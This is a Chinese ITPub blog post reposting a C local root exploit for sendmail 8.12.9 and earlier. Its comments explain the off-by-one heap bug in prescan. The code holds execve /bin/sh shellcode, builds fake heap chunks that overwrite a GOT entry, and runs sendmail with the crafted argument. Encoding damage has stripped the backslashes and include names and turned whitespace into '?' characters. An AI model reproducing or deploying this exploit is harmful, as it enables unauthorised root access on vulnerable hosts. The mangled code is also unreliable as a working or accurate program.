ITPub博客

首页 > IT基础架构 > 网络安全 > sendmail 8.12.9 local root exploit

sendmail 8.12.9 local root exploit

原创 网络安全 作者:coolwinds 时间:2005-07-04 14:08:04 0 删除 编辑
/* Local exploit for the old sendmail vuln found by lcamtuf in 8.12.9 and below.
* by Gyan Chawdhary, gunnu45@hotmail.com
*
* Greets
* sorbo: all the credits go to him for the ideas regarding the exploitation..
* lcamtuf: for finding such a subtle bug ..
* dvorak, scut, gera ..
*
* Theory
* The problem lies in the prescan function. When returnnull is called it does
* not do a check to see if p > addr. This results into p pointing past the
* array by one byte into the size field tag of the next malloc chunk
* ( due to the fact that bufp is allocated in the heap. This value is assigned
* to *delimptr which is used by invalidaddr in parseaddr. The invalidaddr
* function?checks for addresses containing characters used by macros. During
* the parsing of the addrs by invalidaddr, it also checks for illegal chars
* in the adress itself, and if found they are replaced with
* BAD_CHAR_REPLACEMENT (depending on the size field of the allocation of our
* buffer) which is defined as "?" (hex 3f) Due to the offbyone overflow in
* prescan, invalidaddr modifies our chunk value which is later used by free()
* when sm_free(bufp) is called, in return making sendmail vomit !!!!.
* Read the code for details.
*
* Gyan
*/[@more@]

#include
#include
#include

char sc[] =
???"xebx0a"
???"AAAAAAAAAA"
???"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
???"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
???"x80xe8xdcxffxffxff/bin/sh";

#define CHUNK_SIZE 635

/* This function creats the string with fd and bk pointers and?the shellcode.
* Heap will look like this
*---------------------------------------------------------------------
size = 281|??????????|size 23f|fd|bk|shellcode|BBBBBBBB
----------------------------------------------------------------------
* When sm_free(bufp) is called it will consolidate the next buffer, and
* use the fd and bk fields with our value which will allow us to overwrite
*/

char *xp_evilstring(int got, int retloc)
{
? int s;
? char *ptr;
???static char buffer[635];
? ptr = buffer;
? *( (int **)ptr ) = (int *)( got - 12 );
? ptr+=4;
? *( (int **)ptr ) = (int *)( retloc );
? ptr+=4;
? *ptr = 'n';
? ptr++;
?
? /* The 'n' is used for allocating nother buffer in sendtolist by
??* denlstring which will copy our fake chunk and which will be later
??* on consolidated while sm_free(bufp) is called.
??*/
? memcpy(ptr, sc, strlen(sc));
? ptr+=strlen(sc);
? memset(ptr, 'B', sizeof(buffer) - (strlen(sc)+4+4));
? /* Used for having the lsb to 0 so that free() will conolidate it with
??* the other chunk
??*/
? buffer[635] = '';
? ptr = buffer;
? s = strlen(ptr);
//??printf("%dn", s);
//??printf("%sn", ptr);
? return ptr;??

?
}

/*GOT code*/

#define GREP?? "/bin/grep"
#define OBJDUMP "/usr/bin/objdump"
#define AWK?? "/bin/awk"

int xp_getgot(const char *filename, char *function)
{
? char command[512];
? FILE *file;
? char got[8];

? snprintf(command, sizeof(command), "%s -R %s | %s "%s" | %s '{print $1}??????? '", OBJDUMP, filename, GREP, function, AWK);

? file = (FILE *)popen(command, "r");??
? fgets(got, 11, file);
? pclose(file);
? got[8] = '';
? return (strtoul(got, NULL, 16));
}

char *sendmail ="/usr/sbin/sendmail";

main(int argv, char **argc)
{??
? char *c;
? int got = 0x080c1a90;
? int retloc = 0xC0000000 - 4- strlen(sendmail) -1 - strlen(sc)-1;
?
? char *arg[] = { "owned",NULL,sc, NULL };
? c = xp_evilstring(got, retloc);
? printf("%sn", c);
? arg[1] = xp_evilstring(got, retloc);??
? execve(sendmail,arg,NULL);
}?

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-801605/,如需转载,请注明出处,否则将追究法律责任。

上一篇: Sendmail
请登录后发表评论 登录
全部评论

注册时间:2012-10-23

  • 博文量
    253
  • 访问量
    947332